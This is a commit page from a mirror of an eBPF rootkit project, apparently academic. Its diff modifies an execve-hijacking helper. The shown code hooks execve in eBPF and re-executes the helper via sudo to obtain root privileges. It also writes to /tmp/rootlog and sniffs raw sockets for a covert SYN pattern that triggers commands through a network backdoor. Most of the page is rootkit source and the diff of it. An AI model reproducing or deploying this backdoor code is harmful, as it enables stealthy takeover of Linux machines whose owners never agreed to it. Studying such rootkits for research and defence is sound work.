admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-20 00:33:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Corrected issues of opening directories without permission in execve helper

Browse Source
This commit is contained in:
h3xduck
2022-02-24 19:53:11 -05:00
parent b182ac1eeb
commit 805fa760cf
7 changed files with 1090 additions and 1086 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

2139
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

2
src/ebpf/include/bpf/exec.h
View File

@@ -168,7 +168,7 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
return -1; return -1;
} }
hijacker_state = 1; //hijacker_state = 1;
unsigned char newfilename[ARGUMENT_LENGTH] = {0}; unsigned char newfilename[ARGUMENT_LENGTH] = {0};
unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0}; unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};

BIN
src/helpers/execve_hijack
View File

Binary file not shown.

33
src/helpers/execve_hijack.c
View File

@@ -78,11 +78,30 @@ int main(int argc, char* argv[], char *envp[]){
timeinfo = localtime ( &rawtime ); timeinfo = localtime ( &rawtime );
char* timestr = asctime(timeinfo); char* timestr = asctime(timeinfo);
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = argv[0];
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
if(execve("/usr/bin/sudo", args, envp)<0){
perror("Failed to execve()");
exit(-1);
}
}
//We proceed to fork() and exec the original program, whilst also executing the one we //We proceed to fork() and exec the original program, whilst also executing the one we
//ordered to execute via the network backdoor //ordered to execute via the network backdoor
//int bpf_map_fd = bpf_map_get_fd_by_id() //int bpf_map_fd = bpf_map_get_fd_by_id()
int fd = open("/home/osboxes/TFG/src/log", O_RDWR | O_CREAT | O_TRUNC, 0666); int fd = open("/tmp/rootlog", O_RDWR | O_CREAT | O_TRUNC, 0666);
if(fd<0){
perror("Failed to open log file");
//return -1;
}
int ii = 0; int ii = 0;
while(*(timestr+ii)!='\0'){ while(*(timestr+ii)!='\0'){
@@ -100,18 +119,6 @@ int main(int argc, char* argv[], char *envp[]){
write(fd, "\n", 1); write(fd, "\n", 1);
write(fd, "Sniffing...\n", 13); write(fd, "Sniffing...\n", 13);
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = argv[0];
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
if(execve("/usr/bin/sudo", args, envp)<0){
perror("Failed to execve()");
exit(-1);
}
}
packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN); packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
if(packet.ipheader == NULL){ if(packet.ipheader == NULL){

BIN
src/helpers/execve_hijack.o
View File

Binary file not shown.